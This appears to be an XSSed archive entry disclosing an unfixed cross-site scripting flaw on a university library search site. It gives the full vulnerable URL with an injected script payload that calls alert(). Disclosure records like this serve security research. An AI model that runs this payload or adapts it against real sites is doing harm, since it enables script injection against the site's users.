Unfixed XSS vulnerability at vufind.carli.illinois.edu

ID XSSED:68157
Type xssed
Reporter Sony
Modified 2011-12-13T00:00:00


Security researcher Sony, has submitted on 12/07/2010 a cross-site-scripting (XSS) vulnerability affecting vufind.carli.illinois.edu, which at the time of submission ranked 3233 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://vufind.carli.illinois.edu/vf-adl/Search/Home?lookfor=%22%3E%3C%2Fobject%3E%3Cscript%3Ealert(%22www.InSecurity.Ro%22)%3C%2Fscript%3E&type=all&start_over=1&submit=Find